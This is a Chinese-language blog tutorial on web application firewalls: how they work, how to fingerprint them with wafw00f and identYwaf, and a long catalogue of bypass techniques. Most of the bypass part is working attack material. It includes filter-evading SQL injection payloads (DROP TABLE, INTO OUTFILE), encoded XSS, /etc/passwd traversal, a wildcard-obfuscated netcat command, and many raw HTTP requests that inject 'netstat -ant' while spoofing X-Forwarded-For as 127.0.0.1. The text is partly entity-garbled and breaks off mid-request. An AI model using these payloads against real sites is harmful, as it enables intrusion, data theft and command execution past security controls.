Waf从入门到Bypass

作者：吴 | 来源：互联网 | 2023-09-07 07:02

Waf从入门到BypassWeb应用程序防火墙是位于Web应用程序与客户端端点之间的安全策略实施点。该功能可以用软件或硬件，在设备设备中运行或在运行通用操作系统的典型

Waf从入门到Bypass

Web应用程序防火墙是位于Web应用程序与客户端端点之间的安全策略实施点。该功能可以用软件或硬件&＃xff0c;在设备设备中运行或在运行通用操作系统的典型服务器中实现。它可以是独立设备&＃xff0c;也可以集成到其他网络组件中。对于WAF,你了解多少&＃xff1f;需要这篇文章能对你有所帮助&＃xff01;

原文链接&＃xff1a;点我
可以选择加入风起安全一起交流技术&＃xff01;
在这里插入图片描述

0X00 介绍

WAF如何工作&＃xff1a;

使用一组规则来区分正常请求和恶意请求。
学习模式通过了解用户行为自动添加规则。

WAF如何防御&＃xff1a;

负面模型&＃xff08;基于黑名单&＃xff09;-黑名单模型使用预设的签名来阻止显然是恶意的Web流量&＃xff0c;并使用签名来防止利用某些网站和Web应用程序漏洞的攻击。将模型Web应用程序防火墙列入黑名单是公共互联网上的网站和Web应用程序的绝佳选择&＃xff0c;并且对主要的DDoS攻击类型非常有效。例如。阻止所有输入的规则。
肯定模型&＃xff08;基于白名单&＃xff09;-白名单模型仅允许根据特定配置的标准进行网络访问。例如&＃xff0c;可以将其配置为仅允许来自某些IP地址的HTTP GET请求。该模型对于阻止可能的网络攻击可能非常有效&＃xff0c;但是白名单将阻止大量合法流量。将模型列入白名单的防火墙可能最适合内部网络上的Web应用程序&＃xff0c;该网络应用程序设计为仅由有限的一组人员&＃xff08;例如员工&＃xff09;使用。
混合/混合模型&＃xff08;包含模型&＃xff09;-混合安全模型是一种混合了白名单和黑名单的模型。根据各种具体的配置细节&＃xff0c;混合防火墙可能是内部网络上的Web应用程序和公用Internet上的Web应用程序的最佳选择

0X01 如何识别WAF

识别waf技术

一些WAF在请求中设置自己的COOKIE&＃xff08;例如Citrix,Netscaler,Yunsuo WAF,safedog&＃xff09;
有些人将自己与单独的标头关联&＃xff08;例如Anquanbao WAF,AmazonAWSWAF&＃xff09;。
有些经常更改标头和混乱的字符以使攻击者感到困惑&＃xff08;例如Netscaler,Big-IP&＃xff09;。
有些人在服务器头数据包中暴露自己&＃xff08;eg. Approach, WTS WAF&＃xff09;
一些WAF在响应内容body中公开自身&＃xff08;例如DotDefender,Armor,Sitelock&＃xff09;
其他WAF会对恶意请求做出不寻常的响应代码答复&＃xff08;例如WebKnight,360WAF
有些WAF会返回一堆垃圾数据&＃xff0c;卡死你(例如:百度云加速乐)

检测技术:

从浏览器发出普通的GET请求&＃xff0c;拦截并记录响应头&＃xff08;特别是COOKIE&＃xff09;。
从命令行&＃xff08;例如cURL&＃xff09;发出请求&＃xff0c;并测试响应内容和标头&＃xff08;不包括user-agent&＃xff09;。
向随机开放的端口发出GET请求&＃xff0c;并抓住可能暴露WAF身份的标语。
如果某处有登录页面&＃xff0c;表单页面等.请尝试一些常见的&＃xff08;易于检测的&＃xff09;有效负载&＃xff0c;例如 " or 1&＃61;1 – -
将…/…/…/etc/passwd附加到URL末尾的随机参数
在url的末尾添加一些吸引人的关键字&＃xff0c;如’or sleep&＃xff08;5&＃xff09;‘
使用过时的协议&＃xff08;如http/0.9&＃xff09;发出get请求&＃xff08;http/0.9不支持post类型查询&＃xff09;。
很多时候&＃xff0c;waf根据不同的交互类型改变服务器头。
删除操作技术-发送一个原始的fin/rst包到服务器并识别响应。
侧通道攻击-检查请求和响应内容的计时行为。

0X02主流WAF指纹识别:

根据一些waf检测特性&＃xff0c;我们可以一些小技巧&＃xff0c;对WAF进行识别

识别工具

wafw00f https://github.com/enablesecurity/wafw00f

$ wafw00f -l______/ \( Woof! )\______/ ),, ) (_.-. - _______ ( |__|()&＃96;&＃96;; |&＃61;&＃61;|_______) .)|__|/ (&＃39; /|\ ( |__|( / ) / | \ . |__|\(_)_)) / | \ |__|WAFW00F - Web Application Firewall Detection ToolCan test for these WAFs:aeSecure (aeSecure) Airlock (Phion/Ergon) ASP.NET Generic Protection (Microsoft) Astra Web Protection (Czar Securities) AWS Elastic Load Balancer (Amazon) Yunjiasu (Baidu Cloud Computing) Barikode (Ethic Ninja) Barracuda Application Firewall (Barracuda Networks) Bekchy (Faydata Technologies Inc.) BinarySec (BinarySec) BitNinja (BitNinja) BlockDoS (BlockDoS) Bluedon (Bluedon IST) CacheWall (Varnish) CdnNS Application Gateway (CdnNs/WdidcNet) WP Cerber Security (Cerber Tech) ChinaCache CDN Load Balancer (ChinaCache) Chuang Yu Shield (Yunaq) ACE XML Gateway (Cisco) Cloudbric (Penta Security) Greywizard (Grey Wizard) HyperGuard (Art of Defense) .....

identywaf https://github.com/stamparm/identywaf

$ python identYwaf.py __ __ ____ ___ ___ ____ ______ | T T __ __ ____ _____ l j| \ / _]| \ | T| | || T__T T / T| __|| T | \ / [_ | _ Yl_j l_j| ~ || | | |Y o || l_| | | D YY _]| | | | | |___ || | | || || _|j l | || [_ | | | | | | ! \ / | | || ] |____jl_____jl_____jl__j__j l__j l____/ \_/\_/ l__j__jl__j (1.0.XX)Usage: python identYwaf.py [options] Options:--version Show program&＃39;s version number and exit-h, --help Show this help message and exit--delay&＃61;DELAY Delay (sec) between tests (default: 0)--timeout&＃61;TIMEOUT Response timeout (sec) (default: 10)--proxy&＃61;PROXY HTTP proxy address (e.g. "http://127.0.0.1:8080")--proxy-file&＃61;PRO.. Load (rotating) HTTP(s) proxy list from a file--random-agent Use random HTTP User-Agent header value--code&＃61;CODE Expected HTTP code in rejected responses--string&＃61;STRING Expected string in rejected responses--post Use POST body for sending payloads

0X03 WAF绕过技巧

技巧一&＃xff1a;Fuzzing绕过

1.测试受阻

在对waf测试过程中&＃xff0c;下面这段请求被WAF拦截

GET /get/index.jsp?id&＃61;payload HTTP/1.1 Host: 192.168.1.101 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1

####2.选择Fuzzing字典

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack>
https://github.com/foospidy/payloads

####3.脚本编写

def fuzzing(payload):payloads &＃61; []special_chars &＃61; [&＃39;\r&＃39;, &＃39;\n&＃39;, &＃39;\t&＃39;, &＃39;_&＃39;, &＃39;~&＃39;, &＃39;&&＃39;, &＃39;-&＃39;, &＃39;&＃61;&＃39;, &＃39;/&＃39;, &＃39;*&＃39;,&＃39;^&＃39;, &＃39;$&＃39;, &＃39;,&＃39;, &＃39;.&＃39;, &＃39;/&＃39;, &＃39;<&＃39;, &＃39;>&＃39;, &＃39;|&＃39;, &＃39;/**/&＃39;, &＃39;--&＃39;,&＃39;\r\n&＃39;, &＃39;||&＃39;]#special_chars 字典在步骤2中选择合适的for char in special_chars:for k in range(len(payload)):try:temp_payload &＃61; payload[:k] &＃43; char &＃43; payload[k:]payloads.append(temp_payload)except Exception as e:print(e)return payloads

技巧二&＃xff1a;SQL注入

• Step 1:

过滤关键词:and, or, union
可能正则: preg_match(&＃39;/(and|or|union)/i&＃39;, $id)

- Blocked: union select user, password from users - Bypass: 1 || (select user from users where user_id &＃61; 1) &＃61; &＃39;admin&＃39;

####• Step 2:

过滤关键词: and, or, union, where

- Blocked: 1 || (select user from users where user_id &＃61; 1) &＃61; &＃39;admin&＃39; - Bypass: 1 || (select user from users limit 1) &＃61; &＃39;admin&＃39;

####• Step 3:

过滤关键词: and, or, union, where , limit

- Blocked: 1 || (select user from users limit 1) &＃61; &＃39;admin&＃39; - Bypass: 1 || (select user from users group by user_id having user_id &＃61; 1) &＃61; &＃39;admin&＃39;

•Step 4:

过滤关键词: and, or, union, where ,limit , group by, select

- Blocked: 1 || (select user from users group by user_id having user_id &＃61; 1) &＃61; &＃39;admin&＃39; - Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) &＃61; 1

• Step 5:

过滤关键词: and, or, union, where ,limit , group by , select

- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) &＃61; 1 - Bypass: 1 || 1 &＃61; 1 into outfile &＃39;result.txt&＃39; - Bypass: 1 || substr(user,1,1) &＃61; &＃39;a&＃39;

• Step 6:

过滤关键词: and, or, union, where ,limit , group by , select , &＃39;

- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) &＃61; 1 - Bypass: 1 || user_id is not null - Bypass: 1 || substr(user,1,1) &＃61; 0x61 - Bypass: 1 || substr(user,1,1) &＃61; unhex(61)

• Step 7:

过滤关键词: and, or, union, where ,limit , group by , select,&＃39;,hex

- Blocked: 1 || substr(user,1,1) &＃61; unhex(61) - Bypass: 1 || substr(user,1,1) &＃61; lower(conv(11,10,36))

• Step 8:

过滤关键词: and, or, union, where ,limit , group by , select,&＃39;,hex , substr

- Blocked: 1 || substr(user,1,1) &＃61; lower(conv(11,10,36)) - Bypass: 1 || lpad(user,7,1)

• Step 9:

过滤关键词: and, or, union, where ,limit , group by , select,&＃39;,hex , substr ,white space

- Blocked: 1 || lpad(user,7,1) - Bypass: 1%0b||%0blpad(user,7,1)

###技巧三&＃xff1a;混淆

1. 大小写切换

一些开发不完善的WAF会选择性过滤特定案例的WAF。.
我们可以结合使用大小写字符来开发有效的有效载荷.

Standard: Bypassed: Standard: SELECT * FROM all_tables WHERE OWNER &＃61; &＃39;DATABASE_NAME&＃39; Bypassed: sELecT * FrOm all_tables whERe OWNER &＃61; &＃39;DATABASE_NAME&＃39;

2. url编码

使用&＃xff05;编码/ URL编码对普通有效载荷进行编码。
在线工具
Burp包含一个内置编码器/解码器

Blocked: Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F Blocked: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12) Bypassed: uNIoN%28sEleCT&＃43;1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Unicode规范化

unicode编码编码的ASCII字符为绕过提供了很大的Bapass
您可以对整个/部分有效载荷进行编码以获得结果

Standard: Obfuscated: Blocked: /?redir&＃61;http://google.com Bypassed: /?redir&＃61;http://google。com (Unicode替代) Blocked: x Bypassed: &＃xff1c;marquee loop&＃xff1d;1 onfinish&＃xff1d;alert︵1)>x (Unicode替代) Standard: ../../etc/passwd Obfuscated: %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd 4. HTML Representation** 通常&＃xff0c;网络应用会将特殊字符编码为HTML编码&＃xff0c;并相应地进行渲染. Standard: "> Encoded: "> (一般形式) Encoded: "> (html编码) 5. Mixed Encoding 有时&＃xff0c;WAF规则通常倾向于滤除特定类型的编码. 混合编码有效载荷可以绕过这种类型的过滤器. 制表符和换行符进一步增加了混淆. Obfuscated: tt p://6 6.000146.0x7.147/">XSS 6. Using Comments 注释混淆标准有效载荷向量. 不同的有效载荷具有不同的混淆方式. Blocked: Bypassed: Blocked: /?id&＃61;1&＃43;union&＃43;select&＃43;1,2,3-- Bypassed: /?id&＃61;1&＃43;un/**/ion&＃43;sel/**/ect&＃43;1,2,3-- 7. 双重编码通常&＃xff0c;WAF过滤器倾向于对字符进行编码以防止攻击. 但是&＃xff0c;开发不完善的过滤器&＃xff08;没有递归过滤器&＃xff09;可以使用双重编码来绕过. Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c&＃43;dir&＃43;c:\ Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c&＃43;dir&＃43;c:\ Standard: Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E 8. 通配混淆各种命令行实用程序都使用通配符模式来处理多个文件. 我们可以调整它们以执行系统命令. 特定于linux系统上的远程执行代码漏洞. Standard: /bin/cat /etc/passwd Obfuscated: /???/??t /???/??ss?? Used chars: / ? t s Standard: /bin/nc 127.0.0.1 1337 Obfuscated: /???/n? 2130706433 1337 Used chars: / ? n [0-9] 9. 动态有效载荷生成不同的编程语言具有不同的连接语法和模式. 这使我们能够有效地生成可以绕过许多过滤器和规则的有效载荷. Standard: Obfuscated: Standard: /bin/cat /etc/passwd Obfuscated: /bi&＃39;n&＃39;&＃39;&＃39;/c&＃39;&＃39;at&＃39; /e&＃39;tc&＃39;/pa&＃39;&＃39;ss&＃39;wd Standard: Obfuscated: 14. 令牌破坏者对令牌生成器的攻击试图打破在令牌破坏者的帮助下将请求拆分为令牌的逻辑. 令牌破译器是允许影响字符串元素和某个令牌之间的对应关系的符号&＃xff0c;从而绕过通过签名进行搜索. 但是&＃xff0c;在使用令牌断开器时&＃xff0c;请求必须仍然有效. - Case: Unknown Token for the Tokenizer- Payload: ?id&＃61;‘-sqlite_version() UNION SELECT password FROM users -- - Case: Unknown Context for the Parser (Notice the uncontexted bracket)- Payload 1: ?id&＃61;123);DROP TABLE users --- Payload 2: ?id&＃61;1337) INTO OUTFILE ‘xxx’ -- 技巧四: burpsuit插件 https://github.com/codewatchorg/bypasswaf X-Originating-IP 用户可以修改在每个请求中发送的X-Originating-IP&＃xff0c;X-Forwarded-For&＃xff0c;X-Remote-IP&＃xff0c;X-Remote-Addr头。这可能是顶部绕过技术的工具。将WAF配置为信任自己&＃xff08;127.0.0.1&＃xff09;或上游代理设备是常见的&＃xff0c;这是此绕过目标。原始请求插件改变后 X-Originating-IP&＃xff1a;原始IP X-Originating-IP&＃xff1a;127.0.0.1 X-Forwarded-For&＃xff1a;原始IP X-Forwarded-For&＃xff1a;127.0.0.1 X-Remote-IP&＃xff1a;原始IP X-Remote-IP&＃xff1a;127.0.0.1 X-Remote-Addr&＃xff1a;原始IP X-Remote-Addr&＃xff1a;127.0.0.1 案例X-Originating-IP > 127.0.0.1&＃xff1a; GET /get/?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close X-Forwarded-For:127.0.0.2 COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-type “Content-Type”头部在每个请求中可以保持不变&＃xff0c;从所有请求中删除&＃xff0c;或者修改为每个请求的许多其他选项之一。一些WAF将仅仅基于已知内容类型来解码/评估请求&＃xff0c;这个特征针对该弱点。原始请求结果 Content-Type&＃xff1a;原始 Content-Type&＃xff1a;原始 Content-Type&＃xff1a;原始删除Content-Type Content-Type&＃xff1a;原始 Content-Type: invalid Content-Type&＃xff1a;原始 Content-Type: example Content-Type&＃xff1a;原始 Content-Type: multipart/ Content-Type&＃xff1a;原始 Content-Type: multipart/digest Content-Type&＃xff1a;原始 Content-Type: multipart/digest; boundary&＃61;0000 Content-Type&＃xff1a;原始 Content-Type: multipart/; boundary&＃61;0000 案例&＃xff1a; POST /post_key/main.jsp HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Content-Typeapplication/x-www-form-urlencoded Referer: http://10.100.12.249:8080/post_key/ Content-Length: 30 Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Type: multipart/; boundary&＃61;0000name&＃61;%3Bnetstat&＃43;-ant&＃43;&pass&＃61;1 Host 也可以修改“主机”标题。配置不当的WAF可能配置为仅根据此标头中找到的主机的正确FQDN来评估请求&＃xff0c;这是此绕过目标。案例&＃xff1a; POST /post_key/main.jsp HTTP/1.1 Host: 改变这里 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Content-Typeapplication/x-www-form-urlencoded Referer: http://10.100.12.249:8080/post_key/ Content-Length: 30 Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Type: multipart/; boundary&＃61;0000name&＃61;%3Bnetstat&＃43;-ant&＃43;&pass&＃61;1 Pathinfo 路径注入功能可以不修改请求&＃xff0c;注入随机路径信息&＃xff08;/path/to/example.php/randomvalue?restofquery&＃xff09;&＃xff0c;或注入随机路径参数&＃xff08;/path/to/example.php;randomparam&＃61;randomvalue&＃xff1f; resetofquery&＃xff09;。这可以用于绕过依赖于路径信息的编写不良的规则。原始请求 GET /get/?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Pathinfoinjection GET /get//fhwa84a04vq8a0jnefo?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathParametwesinjection GET /get/;mhz&＃61;cpv?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathObfuscation 路径混淆功能将路径中的最后一个正斜杠修改为随机值&＃xff0c;或者默认情况下不做任何操作。最后一个斜杠可以修改为许多值中的一个&＃xff0c;在许多情况下导致仍然有效的请求&＃xff0c;但是可以绕过依赖于路径信息的写得不好的WAF规则。原始请求 GET /get/?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathObfuscation_// GET /get///?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathObfuscation_/./ GET /get/././?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathObfuscation_/random/./ GET /get/co7t/../co7t/../?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathObfuscation_\ GET \get\?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathObfuscation_/.// GET /get/.//.//?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathObfuscation_/./\ GET /get/././\\?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 PathObfuscation_/.\ GET /get/.\.\?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 ParamObfuscation 原始请求 GET /get/?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 ParamObfuscation_&＃43; GET /get/?&＃43;id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 ParamObfuscation_% GET /get/?%id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 ParamObfuscation_%20 GET /get/?%20id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 ParamObfuscation_%00 GET /get/?%00id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 HPP 对已有参数进行赋值&＃xff0c;参数污染原始攻击 GET /get/?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 HPP.First_test(赋值test) GET /get/?id&＃61;;netstat%20-ant&id&＃61;test&id&＃61;test&id&＃61;test HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: 